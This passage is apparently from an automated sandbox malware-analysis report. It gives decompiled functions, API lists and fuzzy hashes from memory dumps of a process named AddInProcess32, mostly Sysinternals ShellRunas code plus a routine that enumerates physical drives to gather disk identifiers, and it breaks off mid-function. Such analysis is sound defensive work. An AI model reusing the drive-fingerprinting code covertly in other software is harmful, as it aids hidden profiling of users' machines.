LoadLibraryW.KERNEL32(Credui.dll,CredUnPackAuthenticationBufferW), ref: 00402E05
GetProcAddress.KERNEL32(00000000), ref: 00402E0C
GetLastError.KERNEL32 ref: 00402E3E
LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForCredentialsW), ref: 00402E56
GetProcAddress.KERNEL32(00000000), ref: 00402E5D
_wcschr.LIBCMT ref: 00402EC5
_wcscpy_s.LIBCMT ref: 00402EE0
GetComputerNameW.KERNEL32 ref: 00402EEE
CredUIParseUserNameW.CREDUI(?,?,00000201,?,?), ref: 00402F0E
CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00402F35

Strings

CredUIPromptForCredentialsW, xrefs: 00402E49
CredUnPackAuthenticationBufferW, xrefs: 00402DF7
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00402EAE
Please enter credentials to use for , xrefs: 00402D23
Sysinternals Run as Different User (Netonly), xrefs: 00402D8B
Sysinternals Run as Different User, xrefs: 00402D95
Credui.dll, xrefs: 00402DA9, 00402DFC, 00402E4E
CredUIPromptForWindowsCredentialsW, xrefs: 00402D9D

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: AddressLibraryLoadProc$Name_memset_wcscpy_s$ComputerCredErrorFreeLastParseTaskUser_wcscat_s_wcschr
String ID: CredUIPromptForCredentialsW$CredUIPromptForWindowsCredentialsW$CredUnPackAuthenticationBufferW$Credui.dll$Please enter credentials to use for $ShellRunas - Sysinternals: www.sysinternals.com$Sysinternals Run as Different User$Sysinternals Run as Different User (Netonly)
API String ID: 3725605542-3868041870
Opcode ID: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
Instruction ID: a6c5cf5511b36f9deb478c5fb5984fdae67559a08a685e8c4f8a8008dfdfd372
Opcode Fuzzy Hash: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
Instruction Fuzzy Hash: A97151B1508341AFD714DF94CD859ABBBF8BFC8744F00492EF285A3290E7B59948CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004029C0 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E004029C0(WCHAR* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v4;
				signed int _v8;
				char _v86;
				short _v88;
				char _v166;
				short _v168;
				char _v204;
				char _v220;
				char _v284;
				char _v300;
				WCHAR* _v768;
				WCHAR* _v772;
				WCHAR* _v780;
				char _v784;
				intOrPtr* _v788;
				char _v792;
				intOrPtr* _v796;
				WCHAR* _v800;
				char _v804;
				void* _v808;
				signed int _v812;
				char _v844;
				char _v852;
				intOrPtr _v856;
				char _v864;
				char _v872;
				char _v876;
				signed int _v884;
				intOrPtr* _v892;
				intOrPtr* _v896;
				intOrPtr* _v908;
				char _v924;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t68;
				signed int _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				signed int _t78;
				intOrPtr* _t81;
				signed int _t86;
				intOrPtr* _t88;
				signed int _t90;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t100;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t104;
				intOrPtr* _t107;
				char* _t109;
				signed int _t111;
				void* _t114;
				WCHAR* _t115;
				void* _t116;
				signed int _t117;
				WCHAR* _t120;
				void* _t159;
				void* _t162;
				signed int _t163;
				void* _t164;
				void* _t165;
				WCHAR* _t166;
				signed int _t168;
				signed int _t169;

				_t168 =  &_v808;
				_t68 =  *0x413004; // 0x98fc836b
				_v4 = _t68 ^ _t168;
				_t166 = _a4;
				_t115 = __ecx;
				_v768 = __ecx;
				_v792 = 0x104;
				_v788 = 0;
				_v804 = 0;
				_v784 = 0;
				_v780 = 0;
				_v800 = 0;
				_v796 = 0;
				_v772 = 0;
				_v168 = 0;
				E00409280(0,  &_v166, 0, 0x4c);
				_v88 = 0;
				_t72 = E00409280(0,  &_v86, 0, 0x4c);
				_t169 = _t168 + 0x18;
				__imp__SHGetMalloc( &_v800, _t159, _t162, _t165, _t114);
				_t163 = _t72;
				if(_t163 < 0) {
					L28:
					_t73 = _v788;
					if(_t73 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
					}
					_t74 = _v808;
					if(_t74 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
					}
					_t120 = _v800;
					if(_t120 != 0) {
						_t81 = _v804;
						 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x14))))(_t81, _t120);
					}
					_t75 = _v792;
					if(_t75 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t75 + 8))))(_t75);
					}
					_t76 = _v804;
					if(_t76 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					}
					_pop(_t164);
					_pop(_t116);
					_t78 = _t163 & 0x0000ffff;
					E0040318A(_t78, _t116, _v8 ^ _t169, _t164);
					return _t78;
				}
				_t86 =  &_v792;
				__imp__SHGetDesktopFolder(_t86);
				_t163 = _t86;
				if(_t163 < 0) {
					goto L28;
				}
				if(SearchPathW(0, _t115, L".exe", _v800, _t166,  &_v772) != 0) {
					_t88 = _v796;
					_v784 = 0x1010000;
					_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0xc))))(_t88, 0, 0, _t166, 0,  &_v804,  &_v784);
					_t163 = _t90;
					__eflags = _t163;
					if(_t163 < 0) {
						goto L28;
					}
					__eflags = _v812 & 0x00010000;
					if((_v812 & 0x00010000) != 0) {
						__imp__CoInitialize(0);
						_t163 = _t90;
						__eflags = _t163;
						if(_t163 < 0) {
							goto L28;
						}
						__imp__CoCreateInstance(0x40d2fc, 0, 1,  &E0040D2CC,  &_v844);
						_t163 = _t90;
						__eflags = _t163;
						if(_t163 < 0) {
							L27:
							__imp__CoUninitialize();
							goto L28;
						}
						_t91 = _v864;
						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x14))))(_t91, _v856);
						__eflags = _t163;
						if(_t163 < 0) {
							goto L27;
						}
						_t93 = _v872;
						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t93))))(_t93, 0x40d2dc,  &_v852);
						__eflags = _t163;
						if(_t163 < 0) {
							goto L27;
						}
						_t96 = _v864;
						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x14))))(_t96, _t115, 0);
						__eflags = _t163;
						if(_t163 < 0) {
							goto L27;
						}
						_t98 = _v896;
						_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t98))))(_t98, 0x40d2ec,  &_v872);
						__eflags = _t100;
						if(_t100 < 0) {
							L25:
							_t101 = _v908;
							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_t101 + 0xc))))(_t101, _t166, _v896,  &_v864, 0);
							L26:
							_t163 = _t103;
							goto L27;
						}
						_t104 = _v884;
						_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x18))))(_t104,  &_v876);
						__eflags = _t163;
						if(_t163 < 0) {
							L18:
							_t117 = 0;
							__eflags = 0;
							L19:
							_t107 = _v892;
							 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))(_t107);
							__eflags = _t117;
							if(_t117 == 0) {
								goto L25;
							}
							_t103 =  &_v204;
							_push(_t103);
							_push(0);
							_push( &_v284);
							_push(_v884);
							L00403172();
							__eflags = _t103;
							if(__eflags == 0) {
								_t109 =  &_v924;
								_push(_t109);
								_push(_t166);
								_push( &_v220);
								_push( &_v300);
								L0040316C();
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									_t163 = 0x80004023;
								}
								goto L27;
							}
							if(__eflags > 0) {
								_t103 = _t103 & 0x0000ffff | 0x80070000;
							}
							goto L26;
						}
						__eflags = _v884 & 0x00001000;
						if((_v884 & 0x00001000) == 0) {
							goto L18;
						}
						_t117 = 1;
						goto L19;
					} else {
						_t163 = 0;
						goto L28;
					}
				} else {
					_t111 = GetLastError();
					if(_t111 > 0) {
						_t163 = _t111 & 0x0000ffff | 0x80070000;
					} else {
						_t163 = _t111;
					}
					goto L28;
				}
			}

0x004029c0
0x004029c6
0x004029cd
0x004029d6
0x004029ea
0x004029ee
0x004029f2
0x004029fa
0x004029fe
0x00402a02
0x00402a06
0x00402a0a
0x00402a0e
0x00402a12
0x00402a16
0x00402a1e
0x00402a2e
0x00402a36
0x00402a3b
0x00402a43
0x00402a49
0x00402a4d
0x00402c33
0x00402c33
0x00402c39
0x00402c41
0x00402c41
0x00402c43
0x00402c49
0x00402c51
0x00402c51
0x00402c53
0x00402c59
0x00402c5b
0x00402c66
0x00402c66
0x00402c68
0x00402c6e
0x00402c76
0x00402c76
0x00402c78
0x00402c7e
0x00402c86
0x00402c86
0x00402c92
0x00402c94
0x00402c97
0x00402c9c
0x00402ca7
0x00402ca7
0x00402a53
0x00402a58
0x00402a5e
0x00402a62
0x00000000
0x00000000
0x00402a82
0x00402aa6
0x00402ab7
0x00402ac6
0x00402ac8
0x00402aca
0x00402acc
0x00000000
0x00000000
0x00402ad2
0x00402ada
0x00402ae4
0x00402aea
0x00402aec
0x00402aee
0x00000000
0x00000000
0x00402b06
0x00402b0c
0x00402b0e
0x00402b10
0x00402c2d
0x00402c2d
0x00000000
0x00402c2d
0x00402b16
0x00402b27
0x00402b29
0x00402b2b
0x00000000
0x00000000
0x00402b31
0x00402b46
0x00402b48
0x00402b4a
0x00000000
0x00000000
0x00402b50
0x00402b5e
0x00402b60
0x00402b62
0x00000000
0x00000000
0x00402b68
0x00402b7b
0x00402b7d
0x00402b7f
0x00402c13
0x00402c13
0x00402c29
0x00402c2b
0x00402c2b
0x00000000
0x00402c2b
0x00402b85
0x00402b96
0x00402b98
0x00402b9a
0x00402bad
0x00402bad
0x00402bad
0x00402baf
0x00402baf
0x00402bb9
0x00402bbb
0x00402bbd
0x00000000
0x00000000
0x00402bc3
0x00402bca
0x00402bcb
0x00402bd3
0x00402bd4
0x00402bd5
0x00402bda
0x00402bdc
0x00402bec
0x00402bf0
0x00402bf1
0x00402bf9
0x00402c01
0x00402c02
0x00402c07
0x00402c0a
0x00402c0c
0x00402c0c
0x00000000
0x00402c0a
0x00402bde
0x00402be5
0x00402be5
0x00000000
0x00402bde
0x00402b9c
0x00402ba4
0x00000000
0x00000000
0x00402ba6
0x00000000
0x00402adc
0x00402adc
0x00000000
0x00402adc
0x00402a84
0x00402a84
0x00402a8c
0x00402a9f
0x00402a8e
0x00402a8e
0x00402a8e
0x00000000
0x00402a8c

APIs

_memset.LIBCMT ref: 00402A1E
_memset.LIBCMT ref: 00402A36
SHGetMalloc.SHELL32(?), ref: 00402A43
SHGetDesktopFolder.SHELL32(?,?,?,?), ref: 00402A58
SearchPathW.KERNEL32(00000000,?,.exe,?,?,?,?,?,?), ref: 00402A7A
GetLastError.KERNEL32(?,.exe,?,?,?,?,?,?), ref: 00402A84

Strings

.exe, xrefs: 00402A73

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: _memset$DesktopErrorFolderLastMallocPathSearch
String ID: .exe
API String ID: 1184172398-4119554291
Opcode ID: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
Instruction ID: 348cd96654d2abbfe703da2164321630b7e188129bd778ae1d25fea451b48038
Opcode Fuzzy Hash: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
Instruction Fuzzy Hash: E981AD71508200AFD320EF58C988D6FB7E9AFC8704F144A6DF549E7290D6B8ED45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02B5355B Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 138
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02B5355B(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v108;
				short _v620;
				intOrPtr _v2904;
				intOrPtr _v2908;
				void _v2920;
				signed int _v2928;
				void _v2932;
				signed int _v2936;
				signed int _v2940;
				intOrPtr _v2944;
				intOrPtr _v2952;
				void _v2956;
				long _v2960;
				long _v2964;
				signed int _t46;
				void* _t56;
				intOrPtr _t70;
				intOrPtr _t71;
				signed int _t83;
				char* _t85;
				signed int _t96;
				void* _t99;
				void* _t101;
				signed int _t102;
				long* _t103;

				_t46 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t46 ^ _t102;
				_t85 = __ecx;
				_t101 = 0;
				 *((char*)(__ecx)) = 0;
				do {
					wsprintfW( &_v620, L"\\\\.\\PhysicalDrive%d", _t101);
					_t103 =  &(_t103[3]);
					_t99 = CreateFileW( &_v620, 0, 3, 0, 3, 0, 0);
					if(_t99 != 0xffffffff) {
						_v2964 = _v2964 & 0x00000000;
						_t56 = E02B52CE7(_t52,  &_v2932, 0xc);
						_v2932 = _v2932 & 0x00000000;
						_v2928 = _v2928 & 0x00000000;
						 *_t103 = 0x8fc;
						E02B52CE7(_t56,  &_v2920);
						if(DeviceIoControl(_t99, 0x2d1400,  &_v2932, 0xc,  &_v2920, 0x8fc,  &_v2964, 0) != 0) {
							_v2960 = 0;
							if(DeviceIoControl(_t99, 0x70000, 0, 0,  &_v2956, 0x18,  &_v2960, 0) == 0) {
								_v2960 = _v2960 & 0x00000000;
							} else {
								_t96 = _v2936 * _v2940 >> 0x20;
								_t83 = E02B53E50(E02B53E50(_v2936 * _v2940, _t96, _v2944, 0), _t96, _v2956, _v2952);
								_t65 = (_t96 << 0x00000020 | _t83) >> 0x1e;
								_v2960 = (_t96 << 0x00000020 | _t83) >> 0x1e;
							}
							E02B52CE7(_t65,  &_v108, 0x64);
							 *_t103 = "---";
							lstrcpyA( &_v108, ??);
							 *0x2b59470 =  *0x2b59470 + _v2960;
							_t70 = _v2908;
							if(_t70 != 0) {
								lstrcatA( &_v108, _t70 +  &_v2920);
							}
							_t71 = _v2904;
							if(_t71 != 0) {
								lstrcatA( &_v108, _t71 +  &_v2920);
							}
							StrNCatA(_t85,  &_v108, 0x28a);
						}
						CloseHandle(_t99);
					}
					_t101 = _t101 + 1;
				} while (_t101 < 0x64);
				StrNCatA(_t85, "---", 0x28a);
				return E02B53C33(_v8 ^ _t102);
			}

0x02b53564
0x02b5356b
0x02b5356f
0x02b53573
0x02b53575
0x02b53578
0x02b53585
0x02b5358b
0x02b535a5
0x02b535aa
0x02b535b0
0x02b535bf
0x02b535c4
0x02b535d1
0x02b535d8
0x02b535df
0x02b53611
0x02b53629
0x02b53640
0x02b5367f
0x02b53642
0x02b53648
0x02b5366b
0x02b53670
0x02b53674
0x02b5367a
0x02b5368b
0x02b53693
0x02b5369b
0x02b536a7
0x02b536ad
0x02b536b5
0x02b536c4
0x02b536c4
0x02b536ca
0x02b536d2
0x02b536e1
0x02b536e1
0x02b536f1
0x02b536f1
0x02b536f8
0x02b536f8
0x02b536fe
0x02b536ff
0x02b53713
0x02b5372b

APIs

wsprintfW.USER32 ref: 02B53585
CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 02B5359F
DeviceIoControl.KERNEL32 ref: 02B53609
DeviceIoControl.KERNEL32 ref: 02B53638
lstrcpyA.KERNEL32(?,00000064), ref: 02B5369B
lstrcatA.KERNEL32(?,?), ref: 02B536C4
lstrcatA.KERNEL32(?,?), ref: 02B536E1
StrNCatA.SHLWAPI(?,?,0000028A), ref: 02B536F1
CloseHandle.KERNEL32(00000000), ref: 02B536F8
StrNCatA.SHLWAPI(?,---,0000028A), ref: 02B53713

Strings

\\.\PhysicalDrive%d, xrefs: 02B5357F
---, xrefs: 02B53693, 02B5370D

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: ControlDevicelstrcat$CloseCreateFileHandlelstrcpywsprintf
String ID: ---$\\.\PhysicalDrive%d
API String ID: 2918303280-2389916857
Opcode ID: 20e46dda7bb7f739cbf91084d7b6b2556cc6e07162c68bbdb861941e2ae98bdf
Instruction ID: 8706a26ed80b4c8c20ffd7dddc755a4eb3619ae0ccefe95d38d45717109d869f
Opcode Fuzzy Hash: 20e46dda7bb7f739cbf91084d7b6b2556cc6e07162c68bbdb861941e2ae98bdf
Instruction Fuzzy Hash: 04516072A40328AFEB119FA0DC49FAA77BCEF04754F0445D9B909EB180DB759A94CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00407219 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407219() {

				SetUnhandledExceptionFilter(E004071DC);
				return 0;
			}

0x0040721e
0x00407226

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000071DC), ref: 0040721E

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
Instruction ID: 4a2c546b5ce0fac6330c053a0bce39fcca3f6a47db525e6d2e0361f563a01c8d
Opcode Fuzzy Hash: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
Instruction Fuzzy Hash: 489002B0A651044EC6001FB05D0950535905A896127514871A401FC1D4EE7454449D6A

Uniqueness

Uniqueness Score: -1.00%

Function 01381AA8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de94b6e7ba717fe7bfd838e2ebb51f2c74a3f24c5ea4661c3e3b03928f95739b
Instruction ID: e2ec0dc0d522a164dab598bcb263af9aa4d0bb8724df374b3716a027fb0f69c6
Opcode Fuzzy Hash: de94b6e7ba717fe7bfd838e2ebb51f2c74a3f24c5ea4661c3e3b03928f95739b
Instruction Fuzzy Hash: 49F0923703D2927BDAC8EA35D0955A37FF4FB5AB043613839C002EB006E626F4579241

Uniqueness

Uniqueness Score: -1.00%

Function 00401D50 Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 213
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401D50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				signed int _v8;
				signed int _v28;
				signed int _v32;
				short _v552;
				struct tagLOGFONTW _v644;
				int _v652;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t21;
				int _t23;
				void* _t24;
				struct HWND__* _t27;
				int _t28;
				long _t30;
				void* _t41;
				struct HBRUSH__* _t43;
				void* _t45;
				void* _t47;
				void* _t48;
				int _t71;
				void* _t72;
				void* _t73;
				int _t74;
				void* _t76;
				struct HWND__* _t78;
				struct HWND__* _t97;
				long _t102;
				void* _t103;
				void* _t105;
				void* _t108;
				signed int _t109;
				void* _t115;

				_t111 = (_t109 & 0xfffffff8) - 0x274;
				_t21 =  *0x413004; // 0x98fc836b
				_v8 = _t21 ^ (_t109 & 0xfffffff8) - 0x00000274;
				_t23 = _a8;
				_t115 = _t23 - 0x138;
				_t71 = _a12;
				_t102 = _a16;
				_t97 = _a4;
				if(_t115 > 0) {
					_t24 = _t23 - 0x200;
					if(_t24 == 0) {
						_push(_t102 >> 0x10);
						_t27 = ChildWindowFromPoint(_t97, _t102 & 0x0000ffff);
						_t78 =  *0x414aa4;
						_t28 =  *0x414aa8;
						if(_t28 == (0 | _t27 == _t78)) {
							 *0x414aa8 = 0 | _t28 == 0x00000000;
							InvalidateRect(_t78, 0, 0);
							_t28 =  *0x414aa8;
						}
						if(_t28 == 0) {
							SetCursor( *0x414a9c);
						} else {
							SetCursor( *0x414aa0);
						}
					} else {
						if(_t24 == 2) {
							_push(_t102 >> 0x10);
							if(ChildWindowFromPoint(_t97, _t102 & 0x0000ffff) ==  *0x414aa4) {
								ShellExecuteW(_t97, L"open", L"http://www.sysinternals.com", 0, 0, 1);
							}
						}
					}
					goto L25;
				} else {
					if(_t115 == 0) {
						if(_t102 !=  *0x414aa4) {
							goto L25;
						} else {
							SetBkMode(_t71, 1);
							if(GetSysColorBrush(0x1a) == 0) {
								_push(0xff0000);
							} else {
								_push(GetSysColor(0x1a));
							}
							SetTextColor(_t71, ??);
							_t41 =  *0x414a98;
							if( *0x414aa8 == 0) {
								_t41 =  *0x414a94;
							}
							SelectObject(_t71, _t41);
							_t43 = GetSysColorBrush(0xf);
							_pop(_t105);
							_pop(_t73);
							E0040318A(_t43, _t73, _v32 ^ _t111, _t105);
							return _t43;
						}
					} else {
						_t45 = _t23 - 0x10;
						if(_t45 == 0) {
							L6:
							EndDialog(_t97, 0);
							PostQuitMessage(0);
							goto L25;
						} else {
							_t47 = _t45 - 0x100;
							if(_t47 == 0) {
								_t48 = GetStockObject(0x11);
								 *0x414a94 = _t48;
								GetObjectW(_t48, 0x5c,  &(_v644.lfOrientation));
								_v644.lfUnderline = 1;
								 *0x414a98 = CreateFontIndirectW( &_v644);
								 *0x414aa8 = 1;
								 *0x414aa4 = GetDlgItem(_t97, 0x40a);
								GetModuleFileNameW(0,  &_v552, 0x208);
								_t74 = GetFileVersionInfoSizeW( &_v552,  &_v652);
								GetFileVersionInfoW( &_v552, 0, _t74, E0040354A(_t74));
								SetDlgItemTextW(_t97, 0x46c, E00401D00(_t55, L"FileVersion"));
								SetDlgItemTextW(_t97, 0x46b, E00401D00(_t55, L"LegalCopyright"));
								 *0x414a9c = LoadCursorW(GetModuleHandleW(0), L"HAND");
								 *0x414aa0 = LoadCursorW(0, 0x7f00);
								ShowWindow(_t97, 5);
								_pop(_t108);
								_pop(_t76);
								E0040318A(1, _t76, _v28 ^ _t111 + 0xc, _t108);
								return 1;
							} else {
								if(_t47 == 1 && (_t71 & 0x0000ffff) + 0xffffffff <= 1) {
									goto L6;
								}
								L25:
								_t30 = DefWindowProcW(_t97, _a8, _t71, _t102);
								_pop(_t103);
								_pop(_t72);
								E0040318A(_t30, _t72, _v8 ^ _t111, _t103);
								return _t30;
							}
						}
					}
				}
			}

0x00401d56
0x00401d5c
0x00401d63
0x00401d6a
0x00401d6d
0x00401d73
0x00401d77
0x00401d7b
0x00401d7e
0x00401f3b
0x00401f40
0x00401f85
0x00401f88
0x00401f8e
0x00401f98
0x00401fa2
0x00401fb0
0x00401fb6
0x00401fbc
0x00401fbc
0x00401fc3
0x00401fd4
0x00401fc5
0x00401fd4
0x00401fd4
0x00401f42
0x00401f45
0x00401f53
0x00401f62
0x00401f75
0x00401f75
0x00401f62
0x00401f45
0x00000000
0x00401d84
0x00401d84
0x00401ed1
0x00000000
0x00401ed7
0x00401eda
0x00401eec
0x00401ef9
0x00401eee
0x00401ef6
0x00401ef6
0x00401eff
0x00401f0c
0x00401f11
0x00401f13
0x00401f13
0x00401f1a
0x00401f22
0x00401f25
0x00401f26
0x00401f30
0x00401f38
0x00401f38
0x00401d8a
0x00401d8a
0x00401d8d
0x00401dae
0x00401db1
0x00401db9
0x00000000
0x00401d8f
0x00401d8f
0x00401d94
0x00401dc6
0x00401dd4
0x00401dd9
0x00401de4
0x00401df5
0x00401dfa
0x00401e0a
0x00401e1b
0x00401e30
0x00401e46
0x00401e65
0x00401e7b
0x00401e9a
0x00401ea4
0x00401ea9
0x00401eb5
0x00401eb6
0x00401ec0
0x00401ec8
0x00401d96
0x00401d99
0x00000000
0x00000000
0x00401fda
0x00401fe1
0x00401fef
0x00401ff0
0x00401ff3
0x00401ffb
0x00401ffb
0x00401d94
0x00401d8d
0x00401d84

APIs

EndDialog.USER32(?,00000000), ref: 00401DB1
PostQuitMessage.USER32(00000000), ref: 00401DB9
GetStockObject.GDI32(00000011), ref: 00401DC6
GetObjectW.GDI32(00000000,0000005C,?), ref: 00401DD9
CreateFontIndirectW.GDI32 ref: 00401DE9
GetDlgItem.USER32 ref: 00401E04
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00401E1B
GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,?,?,?,?), ref: 00401E2B
_malloc.LIBCMT ref: 00401E33
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00401E46
SetDlgItemTextW.USER32 ref: 00401E65
SetDlgItemTextW.USER32 ref: 00401E7B
GetModuleHandleW.KERNEL32(00000000,HAND), ref: 00401E84
LoadCursorW.USER32(00000000), ref: 00401E91
LoadCursorW.USER32(00000000,00007F00), ref: 00401E9F
ShowWindow.USER32(?,00000005), ref: 00401EA9
SetBkMode.GDI32(?,00000001), ref: 00401EDA
GetSysColorBrush.USER32(0000001A), ref: 00401EE8
GetSysColor.USER32(0000001A), ref: 00401EF0
SetTextColor.GDI32(?,00FF0000), ref: 00401EFF
SelectObject.GDI32(?,?), ref: 00401F1A
GetSysColorBrush.USER32(0000000F), ref: 00401F22
ChildWindowFromPoint.USER32 ref: 00401F56
ShellExecuteW.SHELL32(?,open,http://www.sysinternals.com,00000000,00000000,00000001), ref: 00401F75
ChildWindowFromPoint.USER32 ref: 00401F88
InvalidateRect.USER32(?,00000000,00000000,?,?), ref: 00401FB6
SetCursor.USER32(?,?,?), ref: 00401FD4
DefWindowProcW.USER32(?,?,?,?,?,?), ref: 00401FE1

Strings

http://www.sysinternals.com, xrefs: 00401F6A
FileVersion, xrefs: 00401E4B
HAND, xrefs: 00401E7D
open, xrefs: 00401F6F
LegalCopyright, xrefs: 00401E67

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: ColorWindow$CursorFileItemObjectText$BrushChildFromInfoLoadModulePointVersion$CreateDialogExecuteFontHandleIndirectInvalidateMessageModeNamePostProcQuitRectSelectShellShowSizeStock_malloc
String ID: FileVersion$HAND$LegalCopyright$http://www.sysinternals.com$open
API String ID: 3345172160-4191033705
Opcode ID: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
Instruction ID: e26033b52e4dbe09ff1a83e59bdc46354e0d09b5a075afc51df58c3e83d68215
Opcode Fuzzy Hash: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
Instruction Fuzzy Hash: FC61D771640201AFE7109FA5ED89FBB37A8EF88741F11853AF509F61E1CB7898058B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401930 Relevance: 47.3, APIs: 13, Strings: 14, Instructions: 48
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401930(char _a4) {

				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...");
				if(_a4 != 0) {
